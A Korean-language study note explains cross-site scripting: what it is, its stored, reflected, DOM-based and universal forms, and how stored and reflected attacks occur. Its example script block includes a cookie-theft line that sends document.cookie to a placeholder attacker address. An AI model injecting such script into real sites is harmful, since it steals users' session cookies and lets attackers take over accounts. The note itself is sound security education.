XSS는 클라이언트 취약점 중 하나로 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행 가능한 취약점
이로 인해 특정 계정의 세션 정보를 탈취하고 해당 계정으로 임의의 기능 수행 가능
XSS 공격은 이용자가 삽입한 내용을 출력하는 기능에서 발생
클라이언트는 HTTP 형식으로 웹 서버에 리소스를 요청하고 서버로부터 받은 응답 즉 HTML, CSS, JS 등의 웹 리소스를 시각화하여 이용자에게 보여줌
이때 HTML, CSS, JS 같은 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지를 보거나 스크립트가 실행될 수 있음
XSS에는 발생 형태에 따라 다양한 종류로 구분
Stored XSS : XSS에 사용되는 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS
Reflected XSS : XSS에 사용되는 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS
DOM-based XSS : XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS
Universal XSS : 클라이언트의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS
자바스크립트는 웹 문서의 동작을 정의하므로 XSS 공격에 주로 사용됨
ex) 쿠키 및 세션 탈취 코드
<script>
alert<"hello"> // "hello" 문자열 alert 실행
document.cookie; // 현재 페이지의 쿠키
alert(document.cookie); // 현재 페이지의 쿠키를 인자로 가진 alert 실행
document.cookie = "name=test;"; // 쿠키 생성
new Image().src = "http:~~~~~~~" + document.cookie; // 공격자의 주소로 현재 페이지의 쿠키 요청
</script>
Stored XSS
데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생
대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식
Reflected XSS
서버가 악성 스크립트가 담긴 요청을 출력할 때 발생
대표적으로 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식
Reflected XSS는 Stored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생
따라서 공격을 위해서는 이용자를 악성 스크립트가 포함된 링크에 접속하도록 유도해야 함